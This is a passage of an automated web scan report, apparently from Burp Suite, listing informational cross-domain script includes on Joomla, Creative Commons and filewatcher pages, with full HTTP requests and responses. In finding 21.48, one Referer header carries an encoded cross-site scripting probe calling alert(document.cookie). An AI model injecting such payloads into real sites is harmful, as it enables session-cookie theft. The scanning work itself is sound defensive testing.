Date: Mon, 24 Jan 2011 02:23:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=6cd3aab8711a0481615375ee027eb309; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:49 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42915

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.42. http://community.joomla.org/showcase/sites/new.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /showcase/sites/new.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://partner.googleadservices.com/gampad/google_service.js

Request

GET /showcase/sites/new.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e3f36b393f7b576bc345f1ba25fa2851=423eae15ca00d1e8cf624b675f042aa5; path=/
Last-Modified: Mon, 24 Jan 2011 02:23:47 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 69155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
</script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

21.43. http://community.joomla.org/translations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /translations.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /translations.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:23:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:23:23 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 129015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

21.44. http://community.joomla.org/translations/translation-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /translations/translation-policy.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /translations/translation-policy.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:24:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:24:08 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46127


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...

21.45. http://community.joomla.org/user-groups.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.joomla.org
Path:   /user-groups.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAu65O6y8FNQts5goRgAnF6BSnLbr3UYegK-u9ARFPJ9DyegcycxTHXi8ahkaUyHOCeTi45uvT72p79Q&hl=en
  • http://partner.googleadservices.com/gampad/google_service.js
  • http://platform.twitter.com/widgets.js
  • http://www.google.com/buzz/api/button.js
  • http://www.google.com/cse/brand?form=cse-search-box&lang=en

Request

GET /user-groups.html HTTP/1.1
Host: community.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=162598702.1295835678.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 88b9e45a51b17bd9f961adad9aab4c54=14ef1cf25f47d0537309ef7b175ad466; __utma=162598702.639286152.1295835678.1295835678.1295835678.1; __utmc=162598702; __utmb=162598702.2.10.1295835678;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:22:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Mon, 24 Jan 2011 02:22:56 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 205369


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http
...[SNIP]...
<!-- START Google AdSense -->


<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">


</script>
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://www.google.com/buzz/api/button.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAu65O6y8FNQts5goRgAnF6BSnLbr3UYegK-u9ARFPJ9DyegcycxTHXi8ahkaUyHOCeTi45uvT72p79Q&hl=en"></script>
...[SNIP]...

21.46. http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://comunidadjoomla.org
Path:   /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.google.com/jsapi?key=ABQIAAAAwJi6pmtOU9KoRE89ky8j4hT2g3acxeQVlyXMf9OT0uIaiOxxMBRzQeDgzz_B6P_bTCgeZqde47Zzcw

Request

GET /component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html HTTP/1.1
Host: comunidadjoomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 8861b4e100db4cb878a33db82bc27555=00a1c10319baac94765f70e3f43fd867; path=/
Last-Modified: Mon, 24 Jan 2011 14:55:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-es" lang="es-es" dir=
...[SNIP]...
<meta name="verify-v1" content="lHPFfjtNa4bOWp8oZz8FQ0gx6W9F6R5ChOtODv8Ny0E=" />
<script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAwJi6pmtOU9KoRE89ky8j4hT2g3acxeQVlyXMf9OT0uIaiOxxMBRzQeDgzz_B6P_bTCgeZqde47Zzcw"></script>
...[SNIP]...

21.47. http://creativecommons.org/licenses/by/3.0/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://creativecommons.org
Path:   /licenses/by/3.0/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js
  • http://yui.yahooapis.com/2.6.0/build/container/container-min.js
  • http://yui.yahooapis.com/2.6.0/build/json/json-min.js
  • http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js

Request

GET /licenses/by/3.0/ HTTP/1.1
Host: creativecommons.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 18365
Date: Mon, 24 Jan 2011 15:01:57 GMT
X-Varnish: 1761206209 1761206044
Age: 1
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:cc="http://creativecommons.org/ns#"

...[SNIP]...
</script>


<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/yahoo-dom-event/yahoo-dom-event.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/connection/connection-min.js">
</script>
<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/json/json-min.js">
</script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://yui.yahooapis.com/2.6.0/build/container/container-min.js">
</script>
...[SNIP]...

21.48. http://d1.openx.org/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /afr.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:20:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=3c7e6ab0aff972631f0dd2dc260083ec; expires=Wed, 25-Jan-2012 02:20:40 GMT; path=/
Set-Cookie: OAVARS[a8c465c4]=a%3A2%3A%7Bs%3A8%3A%22bannerid%22%3Bi%3A434136%3Bs%3A6%3A%22zoneid%22%3Bs%3A6%3A%22121958%22%3B%7D; path=/
Content-Length: 1480
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.49. http://demo.joomla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB

Request

GET / HTTP/1.1
Host: demo.joomla.org
Proxy-Connection: keep-alive
Referer: http://www.joomla.org/download.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295835652.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11952431.1446326731.1295835652.1295835652.1295835652.1; __utmc=11952431; __utmb=11952431.8.10.1295835652

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:21:23 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Set-Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; expires=Sat, 05-Mar-2011 02:21:24 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:21:24 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en-gb"
   lang="en-gb"
...[SNIP]...
<div id="demoCaptcha">

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB"></script>
...[SNIP]...

21.50. http://demo.joomla.org/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.joomla.org
Path:   /index.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB

Request

GET /index.php HTTP/1.1
Host: demo.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 36d6977f587030fff3662483c73299c9=s88m18ol2u80fe0c55k3k4m1q7; __utmz=228838275.1295835725.1.1.utmcsr=joomla.org|utmccn=(referral)|utmcmd=referral|utmcct=/download.html; __utma=228838275.529671353.1295835725.1295835725.1295835725.1; __utmc=228838275; __utmb=228838275.1.10.1295835725;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 02:25:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 02:25:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 49934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
   xml:lang="en-gb"
   lang="en-gb"
...[SNIP]...
<div id="demoCaptcha">

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB"></script>
...[SNIP]...

21.51. http://dir.filewatcher.com/d/FreeBSD.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 13:45:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3to4ywmN8zS7Go3wRoUzdA"
Content-Length: 7911
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 13:45:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
Age: 4942
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/</title>
</head>
<body
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.52. http://dir.filewatcher.com/d/FreeBSD/6-stable.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "zn3VqZn6o6+vqkKR6xH50w"
Content-Length: 4753
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 198
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/6-stable/</title>
</hea
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.53. http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:11 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZdEUUKqgOBWrwlZy7TjtZA"
Content-Length: 20741
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 195
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.54. http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "+zdjYtQZqpO3zHKlkKVj6Q"
Content-Length: 25529
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 192
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.55. http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "8+frb9HphK5dyFIISMCQmg"
Content-Length: 26078
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 190
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub - Assemble usenet binaries</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.56. http://dir.filewatcher.com/d/FreeBSD/6.2-release.0.0.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dir.filewatcher.com
Path:   /d/FreeBSD/6.2-release.0.0.htm

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js
  • http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en

Request

GET /d/FreeBSD/6.2-release.0.0.htm HTTP/1.1
Host: dir.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:03:46 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "sQZZdgTimuhSOrUYI85R2A"
Content-Length: 4771
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 15:03:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 233
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>/FreeBSD/6.2-release/</title>
</
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
